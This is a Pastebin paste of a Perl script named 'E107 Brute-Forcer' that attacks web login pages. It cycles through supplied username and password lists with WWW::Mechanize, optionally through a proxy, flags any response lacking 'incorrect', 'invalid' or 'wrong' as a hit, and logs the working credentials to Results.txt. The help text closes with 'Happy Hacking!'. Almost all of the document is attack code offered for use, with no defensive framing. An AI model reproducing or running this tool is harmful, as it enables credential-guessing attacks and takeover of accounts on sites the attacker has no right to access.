SHARE
TWEET

Juno

a guest Dec 17th, 2009 203 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/perl
  2. #Thanks also to IBM for helping to create this - Bret Swedeen especially
  3. #NBTDOTM
  4. use HTML::Parser;
  5. use WWW::Mechanize;
  6. use HTTP::Cookies;
  7. use Test::More no_plan;
  8.  
  9.  
  10. my $NumArgs = $#ARGV + 1;#Determine the number of arguments the user has given us
  11. if ($NumArgs <= 2) {
  12.         #Our user has only entered some information. Display help screen.
  13.         header();
  14.         exit();}
  15. if (($NumArgs == 3) or ($NumArgs == 4)){       
  16.         my $url = $ARGV[0]; #Host is the first argument supplied
  17.         my $userloc = $ARGV[1]; #Username is the 2nd argument supplied
  18.         my $passloc = $ARGV[2]; #Passlist location is 3rd argument     
  19.         my $proxyloc = $ARGV[3]; #Location of the proxy
  20.         #Display header
  21. ----------------------------------------------------------------------
  22.                           E107 Brute-Forcer                      
  23.                         Custom Built by Juno                     
  24.                               NBTDOTM                                
  25. ----------------------------------------------------------------------
  26. };
  27. print "\nYour host is: $url";
  28. print "\nYour userlist is: $userloc";
  29. print "\nYour password list is: $passloc";
  30. goto NoProxy if $proxyloc eq '';
  31. print "\nYour proxy is: http://$proxyloc";
  32.  
  33. NoProxy: print "\n\nThe program will now try bruteforcing the host you selected.";
  34. print "\nPress ENTER to begin, or Control-C to quit.";
  35. my $useless = <STDIN>; #Last chance for user to abort attack
  36. print "\nNBTDOTM\n-------------------------\n";
  37. print "\nCreating temp directory to store results in... ";
  38. mkdir('temp', 0777) || print $!;
  39. print "Done.";
  40. #Use userlist
  41. open USERLIST, $userloc or die$!;
  42. my @users = USERLIST;
  43. while (my $user = <USERLIST>) {
  44.         chomp($user);
  45.         print "\nCreating new directory for new user $user... ";
  46.         mkdir('temp' . '\\' . $user, 0777) || print $!;
  47.         print "Done.";
  48.                 #Use passlist
  49.                 open PASSLIST, $passloc or die $!;
  50.                 my @lines = PASSLIST;
  51.                 while (my $password = <PASSLIST>) {
  52.                         chomp($password);
  53.                         print "\nTrying USER $user PASSWORD $password... ";
  54.                         my $outfile = 'temp' . '\\' . $user . '\\' . $password . ".htm";
  55.                         my $mech = WWW::Mechanize->new(autocheck => 1);
  56.                         $mech->stack_depth($max_depth => 0); #Set maxd to 0 if running out of memory;
  57.                         $mech->timeout(60);
  58.                         $mech->cookie_jar(HTTP::Cookies->new());
  59.                         #Set proxy if specified
  60.                         goto GETPAGE if $proxyloc eq '';
  61.                         $mech->proxy(['http'], 'http://' . $proxyloc);
  62.                        
  63.                        
  64.                         GETPAGE: $mech->get('http://' . $url);
  65.                         my $test = $mech->success;
  66.                         if ($@) {
  67.                                 goto GETPAGE; #Error trapping
  68.                                 }
  69.                         print "$test";
  70.                         $mech->field(username => "$user");
  71.                         $mech->field(userpass => "$password");
  72.                         $mech->click();
  73.                         my $output_page = $mech->content();
  74.                         open(OUTFILE, ">$outfile");
  75.                         print OUTFILE "$output_page";
  76.                         close(OUTFILE);
  77.                         my $filesize = -s $outfile;
  78.                         #Search file for 'incorrect','invalid', or 'wrong'; if not found, we have success!
  79.                                 if ($output_page =~ /(incorrect|invalid|wrong)/i) {
  80.                                         print "Wrong Passsword";
  81.                                         } else {
  82.                                         print "SUCCESS";
  83.                                         my $successloc = 'Results.txt';
  84.                                         open(SUCCESS, ">>$successloc");
  85.                                         print SUCCESS "Successful login with USERNAME: $user PASSWORD: $password\n";
  86.                                         close(SUCCESS);
  87.                                 }
  88.                                 #Output current progress to Progress.txt in case of crash
  89.                                 open(PROGRESS, ">Progress.txt");
  90.                                 print PROGRESS "E107 Brute force progress\n----------------------\nLast User Tried: $user\nLast Password Tried: $password\n";
  91.                                 close(PROGRESS);
  92.                         #Delete password file after analysis[Comment out if you want to keep]
  93.                         my $delfile = 'temp' . '\\' . $user . '\\' . $password . ".htm";
  94.                         unlink($delfile);
  95.                 print ".";
  96.                 }
  97.         #Delete username directory
  98.         rmdir('temp' . '\\' . $user);
  99.         }
  100. #Delete temp directory
  101. rmdir('temp');
  102. }
  103. print "\n\nAttack complete!\nResults will be located in Results.txt.";
  104. my $resultsloc = 'Results.txt';
  105. open(RESULTS, ">>$resultsloc");
  106. print RESULTS "----------------\nAttack Complete\n----------------\n";
  107. close(RESULTS);
  108. exit();
  109. sub header{
  110. ----------------------------------------------------------------------
  111.                           E107 Brute-Forcer                      
  112.                         Custom Built by Juno                     
  113.                               NBTDOTM                                
  114. ----------------------------------------------------------------------
  115. Usage: E107Brute [target site] [userlist] [passlist] (proxy)
  116.  
  117. Example: E107Brute somesite.com/login.php users.txt passwords.txt 192.
  118. 168.1.1:80
  119.  
  120. The program will attempt a bruteforce on the usernames specified using
  121. the password list that was supplied. No switches(-) are needed for the
  122. arguments.  Remember to specifiy the full URL to the login page.  The
  123. proxy argument is optional; just omit if you don't need it. Results can
  124. be found in the folder that this tool is run under in 'Results.txt'.
  125. Happy Hacking!
  126. };
  127. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top